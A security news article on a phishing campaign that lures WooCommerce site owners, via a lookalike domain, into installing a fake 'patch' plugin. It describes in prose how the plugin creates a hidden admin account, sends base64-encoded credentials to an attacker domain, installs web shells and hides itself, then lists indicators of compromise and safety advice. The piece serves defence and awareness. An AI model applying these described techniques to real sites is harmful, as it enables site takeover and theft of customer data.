Aman Mishra (GBHackers) reports on a recent phishing campaign targeting WooCommerce users, uncovered by the Patchstack security team. The attackers are using cleverly disguised emails to trick website owners into installing malicious software under the pretense of fixing a non-existent vulnerability.
A New Twist on an Old Trick
This scam falsely warns users about a made-up issue called “Unauthenticated Administrative Access” and urges them to download a “patch” from a fake website. The phishing emails look very official, mimicking real WooCommerce alerts. The domain used—woocommėrce[.]com—features a subtle character swap (notice the “ė” instead of “e”), a classic IDN homograph attack meant to deceive even careful readers.
According to Aman Mishra, this tactic is eerily similar to past “Fake CVE” attacks seen in the WordPress ecosystem, suggesting the same group might be behind it or at least using similar playbooks.
The Attack in Action
Victims who click the “Download Patch” button are taken to a fake WooCommerce Marketplace site. There, they’re prompted to install a ZIP file called authbypass-update-31297-id.zip. Once installed as a plugin, the file hides its activity by using legitimate WordPress functions.
Here’s how it works:
- It creates a hidden admin account via a cronjob with names like
mergeCreator655. - Sends the stolen credentials and site URL, encoded in base64, to woocommerce-services[.]com/wpapi.
- Installs web shells like P.A.S.-Fork, p0wny, and WSO from other malicious domains.
- Hides itself from the plugin list and masks the rogue admin account to avoid detection.
This gives the attackers full control over the site. They can:
- Inject unwanted ads
- Steal billing data
- Redirect users to scam sites
- Launch DDoS attacks
- Or even hold your site ransom by encrypting data
Only Dangerous If You Fall for It
As emphasized by Aman Mishra, this threat only becomes real if someone installs the fake plugin. Neither WordPress nor WooCommerce will ever ask you to manually download and install updates. All legitimate patches are handled through the built-in update system.
Also read: WordPress Security Alert: XSS Vulnerability in Essential Addons for Elementor
Look out for these Indicators of Compromise:
- A strange admin username made of random characters (e.g.,
jd3hr91z) - Unknown cronjob names in your WP Cron
- Suspicious folders in
wp-content/pluginsorwp-content/uploads - Outgoing traffic to malicious domains like
woocommerce-api[.]com
Stay Safe and Smart
Cybersecurity expert Aman Mishra advises WooCommerce users to stay alert. Double-check any urgent email alerts. Always verify update requests through official WooCommerce or WordPress dashboards—never through third-party links in emails.
As attackers evolve, so should your defense. Share this article with other website owners and help them stay one step ahead.
